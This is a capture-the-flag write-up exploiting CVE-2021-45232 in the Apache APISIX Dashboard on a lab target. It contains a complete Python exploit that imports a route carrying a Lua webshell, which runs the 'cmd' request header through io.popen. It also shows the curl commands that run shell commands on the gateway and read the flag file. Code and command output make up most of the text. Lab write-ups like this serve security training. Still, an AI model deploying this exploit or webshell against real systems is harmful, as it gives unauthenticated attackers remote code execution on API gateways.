
CVE-2021-45232

Info

Target description:

Apache APISIX Dashboard versions before 2.10.1 expose two APIs, /apisix/admin/migrate/export and /apisix/admin/migrate/import, that are not covered by the droplet framework's authentication check. An unauthenticated attacker can therefore export and import the gateway's entire configuration, including routes, services and scripts. By importing a malicious route, the attacker can make Apache APISIX request arbitrary sites, or even execute Lua scripts on the gateway.

  • CVE

Entry points

http://d2be512c-64d8-4116-818e-c84717dd4876-488.cyberstrikelab.com:83
http://6debfd48-6e5b-4980-9ef5-22d8aacaa18a-488.cyberstrikelab.com:83

Exploit directly with wuppp/cve-2021-45232-exp, pointed at the first entry point (the dashboard):

┌──(randark㉿kali)-[~/exploit/cve-2021-45232-exp]
└─$ python3 apisix_dashboard_rce.py http://d2be512c-64d8-4116-818e-c84717dd4876-488.cyberstrikelab.com:83
attack success
uri is: /LoEyH0
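The tool treats the two endpoints as a black box. The added example below (written for this writeup; it is not the wuppp tool's code and not the dashboard's) shows what the import payload the tool sends looks like: one enabled route whose `script` field carries a Lua module that runs the value of the `cmd` request header through io.popen, serialized as the dashboard's export JSON and followed by the 4-byte big-endian CRC32 trailer that the import handler validates before writing the data. The export object's key names, the route fields, the multipart field name `file` and the `mode=overwrite` parameter are assumptions taken from public analyses of the handler, not from this page, and `is_vulnerable` only checks that the export endpoint answers without credentials.

```python
"""Build (and optionally send) a CVE-2021-45232 migrate/import payload.

Added example, not the wuppp tool's code. Assumed, not verified here: the
export body is the config JSON plus a 4-byte big-endian CRC32 of that JSON,
import expects the same layout in a multipart field named "file", and the
top-level keys below match the dashboard's export object.
"""
import json
import struct
import sys
import zlib

# Lua module APISIX loads from the route's "script" field. In the access
# phase it runs the "cmd" request header through io.popen and returns the
# output, which is what `curl -H "cmd: whoami"` exercises.
LUA_SCRIPT = r"""
local _M = {}
function _M.access(conf, ctx)
    local cmd = ngx.req.get_headers()["cmd"]
    if not cmd then
        return ngx.exit(ngx.HTTP_NOT_FOUND)
    end
    local f = io.popen(cmd, "r")
    local out = f:read("*a")
    f:close()
    ngx.say(out)
    return ngx.exit(ngx.HTTP_OK)
end
return _M
"""


def build_export(uri, script=LUA_SCRIPT):
    """Config object to import: one enabled route carrying the Lua script.
    The upstream is never reached because access() ends the request first."""
    route = {
        "id": "cve-2021-45232",  # arbitrary id (assumption: string ids accepted)
        "name": "health",
        "uri": uri,
        "status": 1,
        "script": script,
        "upstream": {"type": "roundrobin", "nodes": {"127.0.0.1:80": 1}},
    }
    return {"Consumers": [], "Routes": [route], "Services": [], "SSLs": [],
            "Upstreams": [], "Scripts": [], "GlobalPlugins": [], "PluginConfigs": []}


def sign_payload(export_obj):
    """Serialize and append the CRC32 trailer the import handler compares."""
    body = json.dumps(export_obj, separators=(",", ":")).encode()
    return body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def parse_payload(blob):
    """Mirror of the handler's check: (True, obj) only if the trailer matches."""
    if len(blob) < 4:
        return False, None
    body, trailer = blob[:-4], blob[-4:]
    if struct.unpack(">I", trailer)[0] != (zlib.crc32(body) & 0xFFFFFFFF):
        return False, None
    return True, json.loads(body)


def multipart(fields, file_field, filename, content):
    """Hand-rolled multipart/form-data body; returns (content_type, body)."""
    boundary = "----cve202145232"
    parts = []
    for name, value in fields.items():
        parts.append(f'--{boundary}\r\nContent-Disposition: form-data; '
                     f'name="{name}"\r\n\r\n{value}\r\n'.encode())
    parts.append(f'--{boundary}\r\nContent-Disposition: form-data; '
                 f'name="{file_field}"; filename="{filename}"\r\n'
                 'Content-Type: application/json\r\n\r\n'.encode()
                 + content + b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())
    return f"multipart/form-data; boundary={boundary}", b"".join(parts)


def is_vulnerable(dashboard):
    """True if an unauthenticated GET on /migrate/export returns a CRC-trailed config."""
    import urllib.error
    import urllib.request
    try:
        with urllib.request.urlopen(dashboard + "/apisix/admin/migrate/export", timeout=10) as r:
            ok, obj = parse_payload(r.read())
    except (urllib.error.URLError, ValueError):
        return False
    return ok and isinstance(obj, dict) and "Routes" in obj


def import_route(dashboard, uri):
    """POST the signed payload; mode=overwrite goes in query and form (assumption)."""
    import urllib.request
    ctype, body = multipart({"mode": "overwrite"}, "file", "export.json",
                            sign_payload(build_export(uri)))
    req = urllib.request.Request(dashboard + "/apisix/admin/migrate/import?mode=overwrite",
                                 data=body, method="POST")
    req.add_header("Content-Type", ctype)
    with urllib.request.urlopen(req, timeout=10) as r:
        return r.status, r.read().decode()


if __name__ == "__main__":
    target = sys.argv[1].rstrip("/")  # dashboard base URL
    print("export endpoint unauthenticated:", is_vulnerable(target))
    if len(sys.argv) > 2:  # hypothetical second argument: route uri to import
        print(import_route(target, sys.argv[2]))
```

The CRC trailer is not an authentication mechanism: it is a plain integrity check on the body, so anyone who can reach the endpoint can produce a valid one. The only effective fix is the 2.10.1 change that puts these two handlers behind the same authentication as the rest of the admin API; until then the endpoints should not be reachable from untrusted networks at all.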

Switch to the other entry point, the gateway that now serves the imported route, and interact with it through the cmd header:

┌──(randark㉿kali)-[~/exploit/cve-2021-45232-exp]
└─$ curl http://6debfd48-6e5b-4980-9ef5-22d8aacaa18a-488.cyberstrikelab.com:83/LoEyH0 -H "cmd: whoami"
nobody


┌──(randark㉿kali)-[~/exploit/cve-2021-45232-exp]
└─$ curl http://6debfd48-6e5b-4980-9ef5-22d8aacaa18a-488.cyberstrikelab.com:83/LoEyH0 -H "cmd: ls -lh /"
total 16K
-rw-r--r-- 1 root root 12K Nov 13 2020 anaconda-post.log
lrwxrwxrwx 1 root root 7 Nov 13 2020 bin -> usr/bin
drwxr-xr-x 5 root root 360 Oct 30 12:13 dev
drwxr-xr-x 1 root root 86 Oct 30 12:13 etc
drwxr-xr-x 2 root root 10 Apr 11 2018 home
lrwxrwxrwx 1 root root 7 Nov 13 2020 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Nov 13 2020 lib64 -> usr/lib64
drwxr-xr-x 2 root root 10 Apr 11 2018 media
drwxr-xr-x 2 root root 10 Apr 11 2018 mnt
drwxr-xr-x 2 root root 10 Apr 11 2018 opt
dr-xr-xr-x 9785 root root 0 Oct 30 12:13 proc
dr-xr-x--- 1 root root 26 Sep 3 2021 root
drwxr-xr-x 1 root root 29 Oct 30 12:13 run
-rwxr-xr-x 1 root root 264 Nov 28 2024 run.sh
lrwxrwxrwx 1 root root 8 Nov 13 2020 sbin -> usr/sbin
drwxr-xr-x 2 root root 10 Apr 11 2018 srv
dr-xr-xr-x 13 root root 0 Oct 30 12:13 sys
drwxrwxrwt 1 root root 56 Oct 30 12:13 tmp
drwxr-xr-x 1 root root 27 Nov 13 2020 usr
drwxr-xr-x 1 root root 72 Nov 13 2020 var


┌──(randark㉿kali)-[~/exploit/cve-2021-45232-exp]
└─$ curl http://6debfd48-6e5b-4980-9ef5-22d8aacaa18a-488.cyberstrikelab.com:83/LoEyH0 -H "cmd: cat /run.sh"
#!/bin/bash

# Write the contents of the environment variable $flag to /tmp/flag.txt
echo $flag > /tmp/flag.txt

# Initialize APISIX and start the service
sh -c "/usr/bin/apisix init && /usr/bin/apisix init_etcd && /usr/local/openresty/bin/openresty -p /usr/local/apisix -g 'daemon off;'"


┌──(randark㉿kali)-[~/exploit/cve-2021-45232-exp]
└─$ curl http://6debfd48-6e5b-4980-9ef5-22d8aacaa18a-488.cyberstrikelab.com:83/LoEyH0 -H "cmd: cat /tmp/flag.txt"
go-flag{bac9cfa0-aa91-4094-a625-8efa8f438560}